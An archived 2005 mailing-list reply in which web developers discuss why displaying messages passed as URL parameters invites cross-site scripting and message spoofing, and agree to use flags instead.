On Wed, Feb 16, 2005 at 10:21:24AM -0500, Brett Sanger wrote:
> THat's a bad idea, IMNSHO. Never pass anything as a parameter that will
> get displayed. That would open you up to attacks.
Good point.
> I could send people a link to your site that would email me all sorts of
> info (including cookies, which would let me attack their session). And
> anything I did would appear to be coming from your site.
Yes, but XSS-type attacks could be prevented by cleaning up the the
message input. To me, the bigger problem would be controlling the actual
message which could be used to misguide the user. Your suggestion of
using flags is a good idea.
William
--
Knowmad Services Inc.
http://www.knowmad.com
---------------------------------------------------------------------
Web Archive: http://www.mail-archive.com/suppressed/
http://marc.theaimsgroup.com/?l=cgiapp&r=1&w=2
To unsubscribe, e-mail: suppressed
For additional commands, e-mail: suppressed
Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.